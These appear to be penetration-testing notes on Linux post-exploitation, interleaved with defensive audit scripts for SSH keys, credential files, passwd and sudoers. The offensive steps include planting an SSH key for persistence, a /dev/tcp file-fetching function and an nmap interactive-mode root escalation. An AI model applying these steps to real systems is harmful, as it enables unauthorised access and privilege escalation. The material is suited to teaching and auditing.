Linux Enumeration
Spawning a Shell
So you just got a shell on a machine? The first thing to do is usually to spawn a proper (pty-backed) shell from it. This can be done with:
python -c 'import pty; pty.spawn("/bin/sh")'
Alternatively, a better option is to use SSH, which gets us an even better shell. The first step is to generate a key on our own machine:
ssh-keygen -f mykey
After doing so, cat mykey.pub
and copy all of its contents.
On the target machine, make a .ssh directory in the user's home folder:
mkdir ~/.ssh
cd ~/.ssh
Then echo your key into the authorized_keys file:
echo "<my key contents>" >> authorized_keys
Note that sshd ignores authorized_keys if the file, ~/.ssh or the home directory is writable by group or others (StrictModes, which is on by default), so the directory should be mode 700 and the file mode 600.
Everything is now good to go. To log in, just SSH normally with the key option:
ssh -i mykey <USER>@<IP ADDRESS>
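The same authorized_keys mechanism, seen from the defender's side: the script below is an added example (not part of the original notes) that checks what sshd's StrictModes checks (group/other-writable home, .ssh or authorized_keys) and lists any key in authorized_keys whose key material is not on an allowlist, which is how a key planted the way described above gets noticed. It builds its own throwaway home directory; the key blobs in it are constructed placeholders, not real keys.

```shell
#!/bin/sh
# Added audit helper, not from the original notes.

# check_ssh_perms HOME: returns 1 (and prints why) if HOME, HOME/.ssh or
# HOME/.ssh/authorized_keys is writable by group or others. sshd with
# StrictModes (the default) refuses to use the key file in that case.
check_ssh_perms() {
  rc=0
  for p in "$1" "$1/.ssh" "$1/.ssh/authorized_keys"; do
    [ -e "$p" ] || continue
    perm=$(ls -ld "$p" | cut -c1-10)          # e.g. drwx------
    case $perm in
      ?????w*|????????w*)                      # char 6 = group write, char 9 = other write
        printf 'writable by group/other: %s (%s)\n' "$p" "$perm"; rc=1 ;;
    esac
  done
  return $rc
}

# unexpected_keys KEYFILE ALLOWLIST: prints every key in KEYFILE whose key
# material does not appear in ALLOWLIST (one blob per line). Lines may carry
# options such as command="..." or no-pty before the key type; comments and
# blank lines are ignored.
unexpected_keys() {
  while IFS= read -r line || [ -n "$line" ]; do
    case $line in ''|'#'*) continue ;; esac
    # the base64 blob is the field right after the key type, whatever precedes it
    blob=$(printf '%s\n' "$line" | awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^(ssh-|ecdsa-|sk-)/) { print $(i+1); exit } }')
    if [ -z "$blob" ]; then
      printf 'unparseable: %s\n' "$line"
    elif ! grep -qF -- "$blob" "$2"; then
      printf 'unexpected: %s\n' "$line"
    fi
  done < "$1"
}

# make_sample_home: constructs a temporary home directory with a well-formed
# .ssh layout, an authorized_keys holding two expected keys and one extra key,
# and an allowlist of the expected blobs. Prints the directory path.
make_sample_home() {
  h=$(mktemp -d)                              # mktemp -d creates the dir as 0700
  mkdir "$h/.ssh" && chmod 700 "$h/.ssh"
  cat > "$h/.ssh/authorized_keys" <<'EOF'
# deploy key (expected)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedExpectedKey000000000000 deploy@ci
command="/usr/bin/rsync --server",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedBackupKey backup@nas
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedUnexpectedKey00000000000 mykey
EOF
  chmod 600 "$h/.ssh/authorized_keys"
  printf '%s\n' AAAAC3NzaC1lZDI1NTE5AAAAIConstructedExpectedKey000000000000 \
                AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedBackupKey > "$h/allowed_keys.txt"
  printf '%s\n' "$h"
}

SAMPLE_HOME=$(make_sample_home)
trap 'rm -rf "$SAMPLE_HOME"' EXIT

if check_ssh_perms "$SAMPLE_HOME"; then echo "permissions ok"; fi
unexpected_keys "$SAMPLE_HOME/.ssh/authorized_keys" "$SAMPLE_HOME/allowed_keys.txt"
```

Run it against a real account by calling check_ssh_perms and unexpected_keys with that user's home directory and your own allowlist of known key blobs; the third sample key ("mykey") is the one it reports.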
Linux Enumeration Scripts
There are some great scripts that aid in Linux enumeration:
- LinEnum
- unix-privesc-check
These look through the whole system for interesting information.
Generally the things to look for on Linux are services and processes running as root, as well as the OS and kernel version. Configuration files can also be a source of interesting information such as credentials.
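The "configuration files with credentials" point, from the defender's side: the following is an added example (not from the original notes or from either script named above) that lists files under a directory which any local user can read and which contain a credential-looking setting, i.e. exactly the files an enumeration script would surface first. It runs on a constructed directory tree it builds itself; the secrets in it are placeholders.

```shell
#!/bin/sh
# Added example, not from the original notes.

# Case-insensitive ERE for "password = ...", "API_KEY: ..." style lines.
CRED_PATTERN='(password|passwd|pwd|secret|api[_-]?key|token)[[:space:]]*[=:]'

# exposed_credentials DIR: prints every regular file under DIR that is
# readable by "other" (mode bit 0004) and matches CRED_PATTERN. Files that
# are locked down (e.g. 0600) are not reported even if they hold secrets;
# the finding is the world-readable ones.
exposed_credentials() {
  find "$1" -type f -perm -004 -print | sort | while IFS= read -r f; do
    if grep -qiE "$CRED_PATTERN" "$f" 2>/dev/null; then
      printf '%s\n' "$f"
    fi
  done
}

# credential_lines FILE: the matching lines of one file with the value masked,
# so the audit output itself does not leak the secret.
credential_lines() {
  grep -iE "$CRED_PATTERN" "$1" | sed 's/\([=:][[:space:]]*\).*/\1****/'
}

# make_sample_tree: constructs a small tree with one world-readable config
# holding a password, one owner-only file holding an API key, and one
# world-readable config with no credentials. Prints the root path.
make_sample_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/etc/app" "$d/home/alice"
  printf 'db_host=localhost\ndb_password = ConstructedSecret1\n' > "$d/etc/app/db.conf"
  chmod 644 "$d/etc/app/db.conf"                  # world-readable: reported
  printf 'API_KEY: ConstructedSecret2\n' > "$d/home/alice/.env"
  chmod 600 "$d/home/alice/.env"                  # owner-only: not reported
  printf 'listen=0.0.0.0:8080\nworkers=4\n' > "$d/etc/app/server.conf"
  chmod 644 "$d/etc/app/server.conf"              # readable, but no credentials
  printf '%s\n' "$d"
}

SAMPLE_TREE=$(make_sample_tree)
trap 'rm -rf "$SAMPLE_TREE"' EXIT

for f in $(exposed_credentials "$SAMPLE_TREE"); do
  printf '%s:\n' "$f"
  credential_lines "$f"
done
```

Pointing exposed_credentials at /etc on a real host is the hardening check that mirrors the enumeration step; a 0600 file with the same content is deliberately left out of the report.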
Kernel Exploits
Compiling exploits can be a problem while enumerating. However, the Holy Build Box is perfect for this: it compiles things with no issue and they run as soon as you transfer them over to the target. Still, be smart about running exploits.
If an exploit isn't working, find out why, and skip other exploits that would fail for the same reason.
- Is the exploit giving an mmap error?
  - That is a memory protection mechanism on the target. It means the exploit is useless there and you shouldn't waste any more time on similar ones. Ctrl-F through the other exploits and compare them with the one you just used to see if they rely on the same functions; if they do, move on.
- Does the exploit rely on something?
  - For example, the exploit might need access to a certain file. If it's not there, don't bother compiling or running the exploit.
Basically, when it comes to kernel exploits, be smart and read carefully.
Users
Linux makes dedicated users for important services, for example a www user that runs the HTTP server. Knowing this can aid us: by viewing the /etc/passwd file we can see whether a user like this exists.
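The /etc/passwd review above, carried a step further as an added example (not from the original notes): besides answering "does a www user exist", a defender checking the same file wants to know which accounts have uid 0 and which service accounts carry a real login shell. The script parses a constructed passwd file it writes itself; the 1000 boundary for system accounts is an assumption (it matches UID_MIN on most distributions; check /etc/login.defs).

```shell
#!/bin/sh
# Added example, not from the original notes.

# Accounts with uid below this are treated as system/service accounts.
# Assumed 1000, the usual UID_MIN; adjust from /etc/login.defs if it differs.
SYSTEM_UID_MAX=1000

# uid0_accounts FILE: every account with uid 0. Only "root" should be listed.
uid0_accounts() {
  awk -F: '$3 == 0 { print $1 }' "$1"
}

# service_accounts_with_shell FILE: system accounts (uid 1..SYSTEM_UID_MAX-1)
# whose shell is neither nologin nor false. Each one should be deliberate,
# since such an account can be logged into if its credentials leak.
service_accounts_with_shell() {
  awk -F: -v max="$SYSTEM_UID_MAX" \
    '$3 != 0 && $3 < max && $7 !~ /(nologin|false)$/ { print $1 " (" $7 ")" }' "$1"
}

# account_info FILE NAME: prints name:uid:home:shell for NAME and exits 0,
# or exits 1 if no such account exists (the "does a www user exist" check).
account_info() {
  awk -F: -v name="$2" \
    '$1 == name { print $1 ":" $3 ":" $6 ":" $7; found = 1 } END { exit !found }' "$1"
}

# make_sample_passwd: constructs a passwd file with a web service account,
# a database account that kept a shell, and a second uid-0 account.
make_sample_passwd() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/bin/false
postgres:x:111:118:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
toor:x:0:0:constructed second uid-0 account:/root:/bin/sh
alice:x:1000:1000:alice:/home/alice:/bin/bash
EOF
  printf '%s\n' "$f"
}

SAMPLE_PASSWD=$(make_sample_passwd)
trap 'rm -f "$SAMPLE_PASSWD"' EXIT

echo "uid 0 accounts:";               uid0_accounts "$SAMPLE_PASSWD"
echo "service accounts with a shell:"; service_accounts_with_shell "$SAMPLE_PASSWD"
echo "web server account:";           account_info "$SAMPLE_PASSWD" www-data || echo "none"
```

On the sample, the second uid-0 account "toor" and the postgres account with /bin/bash are the two findings; www-data exists but, with a nologin shell, is only informational.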
File Transfering
Usually machines have some sort of file transfer capability, like wget, curl, ftp, etc. However, in case they don't, there are some other things we can do.
Linux Wget Script
This is a wget replacement written in bash. It relies on bash's /dev/tcp, so it will not work in plain sh, and it is meant for text files (the line-based reader does not preserve binary content). Usage:
    __wget http://example.com/

function __wget() {
    : ${DEBUG:=0}
    local URL=$1
    local mark=0
    local proto server path DOC HOST PORT line
    if [ -z "${URL}" ]; then
        printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]\n" \
            "${FUNCNAME[0]}" "${FUNCNAME[0]}"
        return 1
    fi
    # split "http://host:port/path" on "/" into proto, host[:port] and path
    read -r proto server path <<<"${URL//// }"
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    [[ "${HOST}" == "${PORT}" ]] && PORT=80        # no explicit port in the URL
    [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST PORT=$PORT DOC=$DOC" >&2
    # open a TCP connection on fd 3; HTTP/1.0 keeps the server from answering
    # with chunked transfer encoding, which this simple reader does not decode
    exec 3<>"/dev/tcp/${HOST}/${PORT}" || return 1
    printf 'GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n' "${DOC}" "${HOST}" >&3
    # the headers end at the first empty line (a lone CR after read strips the
    # LF); everything after it is the body, printed verbatim
    while IFS= read -r line || [[ -n "$line" ]]; do
        if [[ $mark -eq 1 ]]; then
            printf '%s\n' "$line"
        elif [[ "$line" == $'\r' || -z "$line" ]]; then
            mark=1
        fi
    done <&3
    exec 3>&-
}
Try Abusing Existing Functionality
Nmap
If nmap is present on the machine, try using interactive mode to see if it grants root privileges. Interactive mode only exists in old Nmap versions (the transcript below is from 4.11).
bash-3.2$ which nmap
which
/usr/bin/nmap
bash-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# whoami
whoami
root
Mess with Sudo
Attempt things like sudo passwd root to see how things work.
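Both the Nmap transcript and the sudo point above come down to what /etc/sudoers allows, so here is the check from the other side: an added example (not from the original notes) that reads a sudoers file and flags rules granting ALL commands, any command on a list of shell-capable binaries (nmap, per the transcript; extend the list for your own environment), or a command runnable without a password. It parses a constructed sample it writes itself; point it at /etc/sudoers and the files in /etc/sudoers.d as root to audit a real host. Alias definitions are skipped rather than expanded, so a rule that grants a Cmnd_Alias is not seen through.

```shell
#!/bin/sh
# Added example, not from the original notes.

# Commands that hand back a shell when run under sudo. nmap is the case from
# the transcript above (its old --interactive mode); extend for your own hosts.
SHELL_CAPABLE="nmap"

is_shell_capable() {
  case " $SHELL_CAPABLE " in *" $1 "*) return 0 ;; esac
  return 1
}

# sudoers_findings FILE: prints one line per risky command in each
# "who host=(runas) [NOPASSWD:] cmd, cmd" rule of FILE. Comments, blank
# lines, Defaults and *_Alias definitions are skipped.
sudoers_findings() {
  file=$1
  while IFS= read -r line || [ -n "$line" ]; do
    case $line in
      ''|'#'*|Defaults*|*_Alias*) continue ;;
      *=*) ;;                               # a user specification
      *) continue ;;
    esac
    who=${line%%[[:space:]]*}               # user, %group or alias the rule is for
    rest=${line#*=}                         # "(runas) [tags:] cmd, cmd"
    case $rest in '('*')'*) rest=${rest#*)} ;; esac
    tags=""
    case $rest in *NOPASSWD:*) tags=" (NOPASSWD)"; rest=${rest#*NOPASSWD:} ;; esac
    # one command spec per line; read strips the surrounding whitespace
    printf '%s\n' "$rest" | tr ',' '\n' | while read -r spec; do
      [ -n "$spec" ] || continue
      set -- $spec                          # word-split: $1 is a tag like SETENV: or the command
      case $1 in *:) shift ;; esac
      cmd=$1
      base=${cmd##*/}
      if [ "$cmd" = ALL ]; then
        printf '%s: ALL commands%s\n' "$who" "$tags"
      elif is_shell_capable "$base"; then
        printf '%s: shell-capable command %s%s\n' "$who" "$cmd" "$tags"
      elif [ -n "$tags" ]; then
        printf '%s: passwordless command %s%s\n' "$who" "$cmd" "$tags"
      fi
    done
  done < "$file"
}

# make_sample_sudoers: constructs a sudoers file with the usual root and
# admin-group rules, a passwordless nmap rule, a harmless apt-get rule and a
# passwordless systemctl rule. Prints its path.
make_sample_sudoers() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
# constructed sample, not a real host's sudoers
Defaults env_reset
Cmnd_Alias NET = /usr/bin/nmap
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
bob ALL=(root) NOPASSWD: /usr/bin/nmap
carol ALL=(ALL) /usr/bin/apt-get update, /usr/bin/apt-get upgrade
dave ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx
EOF
  printf '%s\n' "$f"
}

SAMPLE_SUDOERS=$(make_sample_sudoers)
trap 'rm -f "$SAMPLE_SUDOERS"' EXIT

sudoers_findings "$SAMPLE_SUDOERS"
```

On the sample, bob's rule is the one behind the transcript: nmap as root without a password. carol's apt-get rules produce no finding, and the two ALL rules are reported so that group membership in admin can be reviewed alongside them.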